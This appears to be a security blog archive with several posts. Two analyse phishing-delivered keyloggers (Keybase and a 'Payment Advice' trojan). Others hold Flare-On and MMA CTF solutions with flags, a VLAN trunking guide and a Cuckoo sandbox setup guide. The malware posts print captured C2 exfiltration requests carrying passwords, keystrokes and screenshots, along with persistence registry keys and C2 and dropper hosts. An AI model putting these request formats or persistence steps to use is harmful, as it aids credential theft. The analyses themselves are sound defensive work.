Monday, October 12, 2015

Keybase Logger/Clipboard/CredsStealer campaign

While checking my email another day i came across a phish email that seemed quite suspicious. see below:





































It came with compressed file named Product_details.gz. when extracted; it presented a file named Payment_45476.scr. This file is windows executable which was .net compiled, The file was then opened with a tool called ILSPY in order to analyze its inner workings.
- Looking at its main function it seems it created two threads:








 The function below looks to be using a primitive form of obfuscation that consist on reversing  strings.








Looking at the function below; the malware uses an Encryption class that handles the decryption of several strings found throughout the code see below.

Looking at the function below, it seems it invokes the DecryptText function declared on the Encryption class.











The decoded data corresponds the imports the malware will be using:
  • CreateProcessA  
  • GetThreadContext 
  • SetThreadContext 
  • Wow64SetThreadContext 
  • ReadProcessMemory 
  • WriteProcessMemory 
  • NtUnmapViewOfSection 
  • VirtualAllocEx 
  • ResumeThread
When this sample was executed it was clear the sample had malicious intents.It established persistence by copying itself to the startup folder and setting the autorun registry key at startup. The malware names itself "Important.exe"  which on looking at the code it seems a static value set by the author. see below for registry and file activity.
 [CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe     [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]  
 [RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe  

The malware then starts to reach out to its c2. The requests indicate the malware has the following capabilities:

  • Takes a screenshot of the current working window
  • Acts as a keylogger and credential stealer.
  • Captures clipboard content. 
 GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM  
 HTTP/1.1  
 "steals passwords from chrome password cache"  
 GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY  
 HTTP/1.1  
 "it has keylogging capabilities"  
 GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM  
 HTTP/1.1  
 POST /wp-includes/css/keybase/image/upload.php HTTP/1.1  
 Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930  
 Host: examgist.com  

On looking further to the c2 callbacks, it was noticed the locations in which the screenshots were shared was world readable. See sample below:





































The login panel was also available :




















In conclusion ,this malware is considered primitive based on its design. however, it can certainly cause damage  its kelogging, screen sharing  and credential stealing capabilities make it very attractive to skiddies. thank you for reading


MD5:
7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr
398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr
78c4256eb2003db620a45adba44f404c  Order_34002.gz
9dada7b67f5066e6f5d394222240beb9  Product_details.gz

C2:
http://examgist[.]com/wp-includes/css/keybase/login.php


VT:
https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/


Sunday, September 27, 2015

Flare Challenge 1

First time playing the flare challenge and wanted to know how fun it was.  so i got the first challenge. and it came on a file named Flare-On_start_2015.exe. on executing this file it dumps an additional file named i_am_happy_you_are_to_playing_the_flareon_challenge.exe.  so lets begin:

- first i wanted to know what type of file it was so i ran the file command against it:
 ubuntu@nu11byt3s:/mnt/malware-repo/flare$ file i_am_happy_you_are_to_playing_the_flareon_challenge.exe  
 i_am_happy_you_are_to_playing_the_flareon_challenge.exe: PE32 executable (console) Intel 80386, for MS Windows  

- Good, it seems its a windows binary. so i went ahead an ran it to see what it was like:




- it seems this binary performs some authentication possibly related to the key. so lets open the binary on idapro and see how it looks like in there:


- The section above illustrates the part of the program in which processes the input. the input is then saved on byte_402158 after the call to ReadFile is executed. the next instruction is then a xor instruction which zero out ecx. and after the xor there is a section which seems like an encoding routine lets take a closer look: 
On looking at the Loc_40104D region it seems the program moves a byte  from byte_402158  region to lower byte of eax. then it performs a XOR with value 7D, the xored AL value then gets compared with a byte located on the following region byte_402140 if the comparison is successful it increases ecx by one,  it checks if exc  is 24 and if not it goes back to the beginning of the loop. once the loop reaches 24 it then reaches the section where it prints "you are success".

After this analysis i opened up the binary in inmunity debugger and placed a breakpoint on the xor operation it was described above.  once the input was entered which i used "AAAA" i went ahead and located the location in which our key was located by right clicking->follow dump->address constant  on the following section [ECX+402140] 
 00401055 |. 3A81 40214000 |CMP AL,BYTE PTR DS:[ECX+402140]  

it would automatically show the location where the  encoded key resides as well the data from your input. see below: 
as we can see our encoded key covers 24 bytes starting from address 00402140. i then created an immunity plugin to acquire the key. see the script in action below: 
i called my plugin myplugin and it takes 2 parameters first paramenter is the start address of the key, the next parameter is the end address for the key.  see source code below:
 #!/usr/bin/python  
 import immlib  
 import getopt  
 import immutils  
 from immutils import *   
 imm = immlib.Debugger()  
 def usage():  
      imm.log("Usage: [startingaddr] [endingaddr]")  
 def main(args):  
      key = list()  
      if not args:  
           usage()  
      else:  
           if (len(args) > 1):  
                startingAddr = int(args[0],16)  
                bytes = int(args[1],16) - int(args[0],16)  
                for i in range(bytes):  
                     memchar = imm.readMemory(startingAddr + i,1)  
                     memchar = chr(int(hex(ord(memchar) ^ 0x7d),16))  
                     key.append(memchar)  
                imm.log("key is %s" % ("".join(key)))  
                return "key was found ^_^"  


Thank you for reading and see you next time. 

















Thursday, September 10, 2015

How to Configure Vlan trunking between Cisco switch and ESX host

This blog post explains step by step instructions on how to setup vlan trunking between a cisco switch and an esx host. so lets begin:

Device list: 
Cisco catalyst 3560 switch 
Vmware esxi 5.5.0

-Simple network Diagram below:


- First we need perform the configurations on the cisco switch. below are the commands used:

interface FastEthernet0/7
 description link to trunk to esx vswitch 
 switchport trunk encapsulation dot1q
 switchport trunk allowed vlan 10
 switchport mode trunk
 switchport nonegotiate
 no cdp enable
 spanning-tree portfast trunk

- Second is the setup of the ESX part. first we need to create a vswitch. to create a vswitch we go to the following tab under the ESX management console and click on Add networking and choose Virtual machine. 
























- Then the next menu will allow you to create a vswitch. Create a new vswitch and choose NIC that will be used by this switch. in this example will be vmnic1. then click next.




























- On the section above a Vswitch name Malware-lab was created. on the second option VLAN ID, the vlan number to be setup needs to declared there. in this case is vlan 10.  Once this settings are saved  just perform a ping between the endpoints and it should be able to communicate.

Monday, September 7, 2015

MMA CTF "howtouse" "cannotberun" challenge writeup

howtouse challenge:

- On looking at the file it seems its a windows dll file. After looking at its export section, it contains an interesting export that might give us a lead "fnhowtouse(int)".
- Using ollydbg i loaded the dll and ran the export with the parameter of 1. once it took me to the beginning of its execution i noticed a series of MOV operations referencing the area of memory below which seemed a bit suspicious.

CPU Dump
Address   Hex dump                                         ASCII
71061000  B8 01 00 00|00 C2 0C 00|CC CC CC CC|CC CC CC CC| ¸   Â ÌÌÌÌÌÌÌÌ
71061010  B8 61 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸a   ÃÌÌÌÌÌÌÌÌÌÌ
71061020  B8 62 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸b   ÃÌÌÌÌÌÌÌÌÌÌ
71061030  B8 63 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸c   ÃÌÌÌÌÌÌÌÌÌÌ
71061040  B8 64 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸d   ÃÌÌÌÌÌÌÌÌÌÌ
71061050  B8 65 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸e   ÃÌÌÌÌÌÌÌÌÌÌ
71061060  B8 66 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸f   ÃÌÌÌÌÌÌÌÌÌÌ
71061070  B8 41 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸A   ÃÌÌÌÌÌÌÌÌÌÌ
71061080  B8 4D 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸M   ÃÌÌÌÌÌÌÌÌÌÌ
71061090  B8 30 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸0   ÃÌÌÌÌÌÌÌÌÌÌ
710610A0  B8 31 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸1   ÃÌÌÌÌÌÌÌÌÌÌ
710610B0  B8 32 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸2   ÃÌÌÌÌÌÌÌÌÌÌ
710610C0  B8 33 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸3   ÃÌÌÌÌÌÌÌÌÌÌ
710610D0  B8 34 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸4   ÃÌÌÌÌÌÌÌÌÌÌ
710610E0  B8 37 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸7   ÃÌÌÌÌÌÌÌÌÌÌ
710610F0  B8 38 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸8   ÃÌÌÌÌÌÌÌÌÌÌ
71061100  B8 39 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸9   ÃÌÌÌÌÌÌÌÌÌÌ
71061110  B8 7B 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸{   ÃÌÌÌÌÌÌÌÌÌÌ
71061120  B8 7D 00 00|00 C3 CC CC|CC CC CC CC|CC CC        ¸}   ÃÌÌÌÌÌÌÌÌ

- On looking at the memory region above, there seems to be a pattern in which the first byte is B8 and the next byte is an ascii char. since i noticed there were chars that could be part of the key i figured  it could be used to build the key later on.

- On following the execution of the program, the memory region above was indeed used to build the key what i did was to put a break point on the following instruction and wait for the program to hit it:

CPU Disasm
Address   Hex dump          Command                                  Comments
71061276  |.  C78424 B40000 MOV DWORD PTR SS:[LOCAL.0],71061120      ; Entry point


Once it hit the breakpoint i went to analyze the memory on LOCAL.0. to my surprise it indicated the last part of the key.

CPU Dump
Address   Hex dump                                         ASCII
0012FE90  80 10 06 71|80 10 06 71|70 10 06 71|10 11 06 71| € q€ qp q q
0012FEA0  60 10 06 71|30 10 06 71|E0 10 06 71|40 10 06 71| ` q0 qà q@ q
0012FEB0  00 11 06 71|90 10 06 71|30 10 06 71|10 10 06 71|   q q0 q q
0012FEC0  90 10 06 71|90 10 06 71|A0 10 06 71|60 10 06 71|  q q q` q
0012FED0  30 10 06 71|F0 10 06 71|E0 10 06 71|A0 10 06 71| 0 qð qà q q
0012FEE0  B0 10 06 71|D0 10 06 71|00 11 06 71|E0 10 06 71| ° qÐ q qà q
0012FEF0  40 10 06 71|F0 10 06 71|F0 10 06 71|40 10 06 71| @ qð qð q@ q
0012FF00  00 11 06 71|50 10 06 71|50 10 06 71|E0 10 06 71|   qP qP qà q
0012FF10  50 10 06 71|60 10 06 71|10 10 06 71|00 11 06 71| P q` q q q
0012FF20  50 10 06 71|00 11 06 71|20 10 06 71|C0 10 06 71| P q q qÀ q
0012FF30  B0 10 06 71|50 10 06 71|40 10 06 71|F0 10 06 71| ° qP q@ qð q
0012FF40  20 11 06 71|                                       q

All there is left at this point is to start decoding each byte one by one until the key is revealed.
key: MMA{fc7d90ca001fc8712497d88d9ee7efa9e9b32ed8}



"cannotberun" challenge : this challenge was about fixing a corrupted PE header. once the header was fixed just run the program and it would give you the key.

key: MMA{7a35hxb9q81fsg6}

Wednesday, October 15, 2014

phish campaign named "Payment Advice "


This post will be my first attempt to write about malware analysis since im kinda new in this arena so bear with me :)
  • i came across the following file that was sent via email 
    • Filename: 9757f0417b34d3029876c6e715c81935  Payment Advice.zip
      • unzipped file: a14b8cf65e2195d228b9b982e9e4d54c  Payment Advice.exe
    • Dropper Site: woof:://tundecube[.]com/Payment%20Advice.zip
Once the file is executed it goes ahead and performs the following actions on the system:
  • It drops the following files:
    • sides.exe a14b8cf65e2195d228b9b982e9e4d54c on the following location %AppData%\Microsoft\Windows\Templates\
    • WindowsUpdate.exe a14b8cf65e2195d228b9b982e9e4d54c on the following location %AppData%
    • pid.txt e22dd5dabde45eda5a1a67772c8e25dd on the following location %AppData%
    • pidloc.txt cc02e1e3d512cb89ab8fce39614e7260 on the following location %AppData%
  • it performs the following operations on the registry:
    • it sets side.exe to be ran at startup
      • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\side  =  C:\Users\Peter\AppData\Roaming\Microsoft\Windows\Templates\side.exe
    • it sets WindowsUpdate.exe to be ran at startup as well even it is the same file as side.exe probably in order to setup a backup persistence mechanism.
      • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update  =  C:\Users\Peter\AppData\Roaming\WindowsUpdate.exe
    • it opens a listener on port 49951 on localhost
  • it performs the following  connections
    • 66.171.248.172/whatismyipaddress.com:80 
    • 203.169.229.58/ns58.hostingspeed.net:21
    • 203.169.229.58/ns58.hostingspeed.net: 2927
So on performing deeper analysis on these communications the malware queries whatismyipaddress in order to gather the victim's public ip address. then it performs an ftp connection to ns58.hostingspeed.net. on this connection it uploads a file called    Logger_Notification_PETER-PC 10.15.2014 1:39:00 PM.txt see below for ftp connection and initial content of the file.

and here are the contents of the file uploaded which is suspect the file is a keylogger that sends logs of the system every 40 minutes :


once 40 minutes have passed it sends a report of the data it has collected see below: 

This is how this malware operated it acts as a keylogger and a trojan. thank you for reading.





Sunday, July 27, 2014

Installing/configuring cuckoo sandbox requirements on ubuntu 14 vm on an esx server

im afraid this first post will run a bit long but i really hope the reader find it informative and constructive. here we go...

the first thing we might wanna do is to make sure the ubuntu box run the python version supported for cuckoo. cuckoo supports version 2.7 see below:

labuser@MAE-cuckoo:~$ python --version 
Python 2.7.6

with this in mind we proceed and install the various python libraries needed to perform a successful install. in order to make the installation of libraries easier we go ahead and install pip

root@MAE-cuckoo:/home/labuser# apt-get install python-pip

right after we go ahead and install some requirements with pip

root@MAE-cuckoo:/home/labuser# pip install sqlalchemy bson jinja2 yara 

the next library to be installed is dpkt which is critical for pcap processing this library needs to be installed from source and one might be able to locate it: here
once downloaded decompress it and run the following command 

root@MAE-cuckoo:/home/labuser/cuckoo/dpkt-1.8# python setup.py install 

in the case of yara one needs to downloaded for its git repo and install from source but before attempting to install yara a few packages need to be installed then proceedd to perform the installation : 


root@MAE-cuckoo:/home/labuser/cuckoo/yara-2.1.0# apt-get install automake libtool

root@MAE-cuckoo:/home/labuser/cuckoo/yara-2.1.0# ./build.sh


next we will install libvirt. this package needs to be installed from source since it needs to be compiled  with esx support a good guide on how to install it is here however on ubuntu 14 there are some patching you must do in order to successfully compile libvirt:

on the file /usr/include/linux/if_bridge.h you must add the following include: #include <netinet/ip6.h>

and also run the following command sed -i -e '/gets is a security/d' grub-core/gnulib/stdio.in.h

also if youre planning to install the latest version of libvirt which is  libvirt-1.2.5 at the moment of this writing you need apso the following package: libpciaccess-dev. in addition  

then we go ahead and install django 
root@MAE-cuckoo:/home/labuser/cuckoo/libvirt-1.2.5# apt-get install python-django

next we install pefile lib 
root@MAE-cuckoo:/home/labuser/cuckoo# wget --no-check-certificate https://pefile.googlecode.com/files/pefile-1.2.10-1
39.tar.gz
root@MAE-cuckoo:/home/labuser/cuckoo/pefile-1.2.10-139# python setup.py install

next we install volatility 
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# wget https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# python setup.py install 

next we configure tcpdump so it can be ran from a non-root account 
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

next we create cuckoo user and group which is the account cuckoo will run under 
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# adduser cuckoo
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# groupadd cuckoogrp
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# usermod -a -G cuckoogrp cuckoo

now we are ready to download/install cuckoo which can be downloaded here once downloaded the configuration is pretty straightforward see here

thanks for reading and be tuned for the next post which will be related with preparing vms for the cuckoo environment.